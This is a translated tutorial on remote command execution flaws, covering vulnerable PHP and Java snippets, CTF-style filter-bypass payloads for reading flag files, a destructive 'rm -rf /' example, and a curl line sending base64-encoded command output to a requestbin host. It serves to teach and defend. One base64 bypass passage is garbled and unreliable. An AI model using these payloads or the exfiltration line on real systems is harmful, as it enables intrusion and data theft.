1. Background
RCE (Remote Command /Code Execute) Remote Code Execution Vulnerability
Connect the backdoor or interface reserved in the program through PHP code injection, Java code injection, etc. to perform remote command execution , to achieve control of the server.
Why do remote code execution vulnerabilities occur?
Web applications sometimes need to call and execute some system command functions. For example, if the user wants to enter commands through the Web page to test whether the system and www.xxx.com can be connected normally, then the bottom layer of the Web application may go When the system operation command "ping" is called, if the web program here does not filter the commands entered by the user, it is likely to cause a system command execution vulnerability.
Remote management tools need to execute system commands: We usually use remote management tools to link to the server for remote server management and control server software. If these tools are vulnerable, an attacker can exploit them to execute some remote commands and gain control of the target system.
2. Principle of remote command execution
2.1 If there is no filtered remote command execution
Remote command execution means that the user submits an execution command through a browser or a remote attack. Since the server side does not filter the execution function, the malicious command is executed.
For example, in Java code, let’s demonstrate the remote code execution vulnerability:
import java.io.IOException;
import java.util.Scanner;
public class CommandRunner {
public static void main(String[] args) throws IOException {
Scanner scanner = new Scanner(System.in);
String command = scanner.nextLine();
Runtime.getRuntime().exec(command); // 潜在的远程代码执行漏洞
}
}
In the above code, the program uses the Scanner class to obtain the command entered by the user, and uses the exec() method of the Runtime class to execute the command. However, there is apotential remote code execution vulnerability. If the application does not properly validate and sanitize user input, an attacker can execute arbitrary code by entering malicious commands.
For example, if the user enters ls -a, the program will execute the ls -a command to list all files and folders in the directory. However, if the user enters rm -rf /, it is equivalent to performing a deletion operation, which may result in the loss of system data.
In systems developed with PHP language, which is relatively common on the Web, if PHP's dangerous functions and statements (system, exec, shell_exec, passthru, popen, ``, eval, assert, preg_replace, call_user_func, array_map, dynamic functions) are used, After construction, you can use strings or PHP codes to execute system command features, thereby calling these functions to achieve remote code execution and control the server.
2.2 Bypassing filtering
At this point we have to refer to the command replacement. First, we first understand the logic of multiple command execution. Take the Linux system as an example as shown below:
| symbol | example | explain |
|---|---|---|
| ; | A;B | B will be executed regardless of whether A is executed successfully or not. |
| & | A&B | A is executed in the background; A and B are executed simultaneously |
| && | A&&B | B can only be executed after A is successfully executed. |
Secondly, commands to view and execute in Linux
Common viewing commands
If the key string is intercepted, how to bypass it?
Spaces are filtered
%09 (URL encoding of tab key) ${IFS} replaces space key
Filter string
Can the wildcard * (string of any length) be used? (Replace one character) []
For example, if we want to view the flag file, we can use the following bypass method, but filter the flag string:
cat [e-g ]lag
cat *lag
cat ?lag
过滤文版
; | || & &&
过滤cat
tac nl more …
Filter spaces
%09 (tab key url encoding) ${IFS} $IFS$9 <
Filter string
Wildcard
f* fla? [e-g]la[a-g]
Caret < /span> 1 Y 2 F 0 I G Z s Y W c u c G h w ∣ b a s e 64 1Y2F0IGZsYWcucGhw|base64 echo$IFS cat needs to be executed via Base64 encoding Y2F0IGZsYWcucGhw is encrypted with base64 cat flag.phpor use base64 encoding
fl''ag fl""ag f\lag
1Y2F0IGZsYWcucGhw∣base64IFS$1-d|sh
3. Remote command execution example
Next, we use PHP functions to demonstrate the existing remote command execution vulnerability.
3.1 Remote execution function without any filtering
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
system($c)
}
?>
This instance has no interception and can execute any Linux command passed in through the url.
3.2 No execution result is returned
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
system($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__);
}
The main analysis is that the c command can be constructed, but the system command is used, but please note that if you construct ?c=ls directly, it will be constructed as ls>/dev/null 2>&1 means that the command execution result will not be displayed. What should I do? ? When the construction command is executed, ?c=ls;pwd will be constructed into ls;pwd>/dev/null 2>&1, which will throw the pwd result into the trash can, and ls will be executed and echoed normally.
3.3 Filter special characters
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
This mainly filters the input command c. There cannot be a semicolon; (you can use || to separate the command, or use & (the execution of the incoming command in the URL needs to escape URLEncode%26 with &)) and cat (you can Use tac or ca\t, etc.), the rest of the principles are the same as the above question?c=ls||pwd command to query all files, and then you cannot use cat. You can use tac to view the flag.php file in flashback
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag/i", $c)){
system($c." >/dev/null 2>&1");
}else{
echo 'error!';
}
}else{
highlight_file(__FILE__);
}
The principle is the same as above, but the flag keyword is filtered here. If you use tac flag.php, it will not be executed. You can use the wildcard tac fla*.php
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| /i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
The principle is the same as above, but spaces are filtered here. You can use $IFS$9 instead.
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
Same as above, this adds numbers and $ that cannot be filtered and * wildcard (can use ? wildcard), c=tac<>?lag.php||pwd uses bypass
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
echo($c);
$d = system($c);
echo "
".$d;
}else{
echo 'no';
}
}else{
highlight_file(__FILE__);
}
This question has a lot of filtering keywords?c=ca\t{$IFS}fl?g.php By using such a command to bypass it, because it does not throw the results into a black hole, so there is no need for a command connector
这是一道pikachu靶场提供了测试域名/IP的 Ping 功能(命令执行漏洞模块),通过信息收集,我们得知其对命令的过滤条件
/?ip=
PING 1.1.1.1 (1.1.1.1): 56 data bytes
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "
";
print_r($a);
}
?>
It was found through code analysis that wildcards and space encodings were filtered, and "/.*f.*l.a.g ./"This kind of regular matching is invalid for directly constructing flags and using wildcards, because is also filtered, and we can use variable naming, Construct two variables a and b, such as:?ip=1.1.1.1;b=ag;a=fl;cat$IFS 9 9 9a$b.php
3.4 There is no echo when executing the command
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
exec($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__);
}
The exec used by this function performs remote command execution. The execution result is no echo. What should I do if I want to read a specific file flag? Consider writing the results to another file, and then accessing this file separately, first if the system has write permissions, or with external data.
For example, to write to another file, the operation is as follows: cat flag.php > 123.txt to write the result to the 123.txt file. Then write the result into the 123.txt file through ?c=ls > 123.txt, and then ask 123.txt to get the content.
For example, using takeout through the takeout platform https://requestbin.net/, but there is a length limit on the parameters passed by get?c=curl http: //http.requestbin.buuoj.cn/xxx?c=ls|sed -n "1,5p"|base64 Display the results only display 1~5 lines and then encode the results through base64
4. Typical cases
Remote command execution vulnerabilities are particularly harmful. Remote execution vulnerabilities have been exposed, such as:
log4j command execution (CVE-2017-5645): It is the Apache Log4j server A deserialization command execution vulnerability allows an attacker to remotely execute commands by sending a crafted request, thereby compromising the security of the server.
pache Struts vulnerability (CVE-2017-5638): This is a very famous case of RCE vulnerability that affects the Apache Struts framework. An attacker could exploit this vulnerability by sending a malicious HTTP request to execute arbitrary code and gain control of the server. This vulnerability was widely exploited and resulted in multiple large-scale data breaches.
Microsoft Windows SMB Vulnerability (MS17-010): This is an RCE vulnerability affecting the Microsoft Windows operating system. An attacker could exploit this vulnerability to execute arbitrary code on the remote system by sending a specially crafted SMB request. This vulnerability was used to spread the WannaCry ransomware, causing large-scale attacks and data loss worldwide.
Drupal Vulnerability (CVE-2018-7600): This is an RCE vulnerability affecting the Drupal content management system. An attacker could exploit this vulnerability to execute arbitrary code and gain control of the website server by sending specially crafted requests. This vulnerability was widely exploited, resulting in many Drupal websites being hacked and manipulated.
Apache Tomcat Vulnerability (CVE-2020-1938): This is an RCE vulnerability affecting the Apache Tomcat server. An attacker could exploit this vulnerability to execute arbitrary code and gain control of the server by sending specially crafted requests. This vulnerability is known as "Ghostcat" and affects many Tomcat servers.
Jenkins Vulnerability (CVE-2018-1000861): This is an RCE vulnerability affecting the Jenkins continuous integration tool. An attacker could exploit this vulnerability to execute arbitrary code on an affected Jenkins server by sending a specially crafted request. This vulnerability was widely exploited, resulting in many Jenkins servers being compromised and abused.
5. Summary
Today I shared the principles of remote command execution and how to exploit and bypass remote command execution vulnerabilities. Remote command execution vulnerabilities are particularly harmful. Attackers can use remote command execution vulnerabilities to bring problems to the operation team. Some of the dangers include: inheriting the permissions of the web service program to execute system commands or read and write files, rebound shells, control the entire website or even the server, and further penetrate the intranet. In the process of defense, we can strengthen the verification of user input: such as limiting the input content. Secondly, adopt the minimum Permission principle, restrict program running permissions to the minimum.